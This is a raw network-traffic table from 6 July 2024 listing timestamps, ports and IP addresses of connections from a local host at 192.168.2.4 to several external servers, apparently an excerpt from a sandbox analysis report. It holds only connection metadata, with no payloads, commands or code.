Jul 6, 2024 13:28:15.054480076 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.054838896 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.054853916 CEST	443	49838	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:15.159341097 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.164190054 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.166008949 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.166063070 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.170783997 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.173758984 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.178487062 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.530296087 CEST	443	49838	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:15.534976959 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.535001040 CEST	443	49838	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:15.674607992 CEST	443	49838	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:15.674662113 CEST	443	49838	104.26.13.205	192.168.2.4
Jul 6, 2024 13:28:15.674966097 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.676346064 CEST	49838	443	192.168.2.4	104.26.13.205
Jul 6, 2024 13:28:15.980057001 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.980073929 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.980086088 CEST	80	49839	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:15.980123043 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.980158091 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:15.984638929 CEST	49839	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.097021103 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.101877928 CEST	80	49840	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:16.101962090 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.102128029 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.105416059 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.105454922 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.105771065 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.106117010 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.106132030 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.106890917 CEST	80	49840	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:16.106971979 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.111782074 CEST	80	49840	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:16.723897934 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.723967075 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.727150917 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.727159023 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.727432966 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.730072021 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:16.730110884 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:16.821794033 CEST	80	49840	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:16.825100899 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:16.825536966 CEST	80	49840	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:16.825594902 CEST	49840	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.026365042 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.027945995 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.027987957 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028110981 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028151035 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028290033 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028331995 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028440952 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028460026 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028652906 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028661966 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028676033 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028681040 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028707027 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028707027 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028714895 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028723001 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028847933 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028858900 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028876066 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028882980 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028898001 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028904915 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.028922081 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.028930902 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029264927 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029273033 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029284000 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029295921 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029314995 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029321909 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029336929 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029342890 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029351950 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029357910 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029376984 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029381037 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029388905 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029395103 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029464006 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029470921 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029479027 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029484987 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029500961 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029500961 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029506922 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029514074 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029524088 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029530048 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.029726028 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029736042 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029758930 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029758930 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029788971 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029803991 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029814005 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029911995 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.029927015 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030013084 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030019999 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030042887 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030081034 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030160904 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030201912 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030244112 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030253887 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030276060 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030508041 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030550957 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030560970 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030575037 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.030600071 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.039298058 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.042205095 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.042218924 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.059375048 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.059387922 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.059401989 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.059407949 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.060240030 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.065993071 CEST	80	49842	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.068609953 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.072931051 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.080471039 CEST	80	49842	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.080514908 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.085560083 CEST	80	49842	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.813174963 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.813252926 CEST	443	49841	149.154.167.220	192.168.2.4
Jul 6, 2024 13:28:17.814522028 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.815205097 CEST	49841	443	192.168.2.4	149.154.167.220
Jul 6, 2024 13:28:17.817667007 CEST	80	49842	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.818980932 CEST	80	49842	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.819053888 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.823968887 CEST	49842	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.938822985 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.943783998 CEST	80	49843	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.944020033 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.944094896 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.949124098 CEST	80	49843	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:17.949173927 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:17.954054117 CEST	80	49843	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:18.409015894 CEST	49831	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:18.409696102 CEST	49844	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:18.413865089 CEST	6660	49831	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:18.414427042 CEST	6660	49844	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:18.414506912 CEST	49844	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:18.415153980 CEST	49844	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:18.420726061 CEST	6660	49844	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:18.768424988 CEST	80	49843	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:18.769587040 CEST	80	49843	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:18.769638062 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.773179054 CEST	49843	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.880016088 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.885644913 CEST	80	49845	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:18.885718107 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.885767937 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.890639067 CEST	80	49845	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:18.890686035 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:18.895587921 CEST	80	49845	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:19.600984097 CEST	80	49845	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:19.601054907 CEST	80	49845	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:19.601113081 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.622816086 CEST	49845	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.786082029 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.790932894 CEST	80	49846	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:19.791013956 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.823570013 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.828341961 CEST	80	49846	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:19.828388929 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:19.833261013 CEST	80	49846	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:20.078535080 CEST	6660	49844	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:20.079772949 CEST	49844	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:20.561506987 CEST	80	49846	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:20.561759949 CEST	80	49846	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:20.561841011 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.567049026 CEST	49846	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.697001934 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.701956987 CEST	80	49847	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:20.702024937 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.702090025 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.706840992 CEST	80	49847	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:20.706885099 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:20.711636066 CEST	80	49847	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:21.406790018 CEST	80	49847	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:21.407067060 CEST	80	49847	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:21.407114029 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.412734032 CEST	49847	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.519092083 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.524056911 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:21.524131060 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.524236917 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.528991938 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:21.529037952 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:21.533896923 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.393238068 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.393451929 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.393461943 CEST	80	49848	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.395842075 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.404922962 CEST	49848	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.519736052 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.524609089 CEST	80	49849	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.525888920 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.525957108 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.530721903 CEST	80	49849	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:22.531734943 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:22.538048029 CEST	80	49849	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:23.797530890 CEST	80	49849	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:23.798049927 CEST	80	49849	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:23.798240900 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.805078030 CEST	49849	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.909410954 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.914266109 CEST	80	49850	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:23.914350033 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.914511919 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.919419050 CEST	80	49850	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:23.919540882 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:23.924366951 CEST	80	49850	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:24.676249981 CEST	80	49850	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:24.677126884 CEST	80	49850	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:24.677177906 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.681629896 CEST	49850	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.796848059 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.801824093 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:24.801914930 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.804114103 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.809088945 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:24.809154034 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:24.813960075 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.096430063 CEST	49844	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.096734047 CEST	49852	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.101411104 CEST	6660	49844	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.101593971 CEST	6660	49852	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.101661921 CEST	49852	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.101984024 CEST	49852	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.107094049 CEST	6660	49852	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.260617971 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.557785988 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.557966948 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.557977915 CEST	80	49851	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.558018923 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.559029102 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.559078932 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:25.563420057 CEST	49851	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.564017057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.675051928 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.680509090 CEST	80	49854	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.683794022 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.683913946 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.690013885 CEST	80	49854	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.690489054 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:25.695700884 CEST	80	49854	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:25.879398108 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:25.940104008 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:26.018897057 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:26.081592083 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:26.088663101 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:26.089844942 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:26.096091032 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:26.159303904 CEST	7707	49797	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:26.236946106 CEST	49797	7707	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:26.415488005 CEST	80	49854	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:26.415633917 CEST	80	49854	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:26.415738106 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.419182062 CEST	49854	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.535742998 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.540703058 CEST	80	49855	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:26.543922901 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.543922901 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.549971104 CEST	80	49855	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:26.555844069 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:26.563659906 CEST	80	49855	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:26.767956972 CEST	6660	49852	94.232.249.204	192.168.2.4
Jul 6, 2024 13:28:26.768016100 CEST	49852	6660	192.168.2.4	94.232.249.204
Jul 6, 2024 13:28:27.424565077 CEST	80	49855	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.425307989 CEST	80	49855	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.425354958 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.428147078 CEST	49855	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.534673929 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.540786028 CEST	80	49856	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.540847063 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.540889978 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.545917988 CEST	80	49856	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.545969963 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.551208973 CEST	80	49856	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.649852991 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.649873972 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.650230885 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.653630018 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:27.653645039 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:27.654366970 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.654391050 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:27.655771971 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.656131029 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.656142950 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:27.702786922 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.702801943 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:27.702922106 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.703077078 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:27.703080893 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.137713909 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.137835979 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.139743090 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.139750957 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.139993906 CEST	443	49857	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.180561066 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.312266111 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.315751076 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.315779924 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.319858074 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.321388960 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.321394920 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.321604967 CEST	443	49858	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.337816954 CEST	80	49856	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.338095903 CEST	80	49856	188.114.96.3	192.168.2.4
Jul 6, 2024 13:28:28.341187000 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.341187000 CEST	49856	80	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.356246948 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.359836102 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.359848976 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.361102104 CEST	49858	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.361107111 CEST	49857	443	192.168.2.4	188.114.96.3
Jul 6, 2024 13:28:28.362091064 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.362091064 CEST	49859	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:28:28.362098932 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.362310886 CEST	443	49859	162.125.66.15	192.168.2.4
Jul 6, 2024 13:28:28.367742062 CEST	49859	443	192.168.2.4	162.125.66.15
